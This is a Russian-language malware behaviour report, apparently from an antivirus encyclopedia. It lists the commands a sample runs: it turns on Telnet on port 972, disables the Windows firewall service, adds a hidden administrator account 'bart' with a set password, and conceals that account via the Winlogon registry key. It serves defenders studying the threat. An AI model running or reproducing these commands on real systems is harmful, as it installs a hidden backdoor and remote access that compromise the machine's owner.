Техническая информация
Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
Вредоносные функции:
Запускает на исполнение:
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- %WINDIR%\regedit.exe /s conf.reg
- <SYSTEM32>\sc.exe config sharedaccess start= disabled
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-SSH
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\net1.exe localgroup Администраторы bart /add
- <SYSTEM32>\net1.exe user bart 231 /add
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\net1.exe localgroup %USERNAME%s bart /add
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "bart" /t REG_DWORD /d 0 /f
Изменения в файловой системе:
Создает следующие файлы:
- <LS_APPDATA>\Сканер..exe
- %TEMP%\~1.bat
Присваивает атрибут 'скрытый' для следующих файлов:
- %TEMP%\~1.bat
Другое:
Ищет следующие окна:
- ClassName: 'RegEdit_RegEdit' WindowName: ''
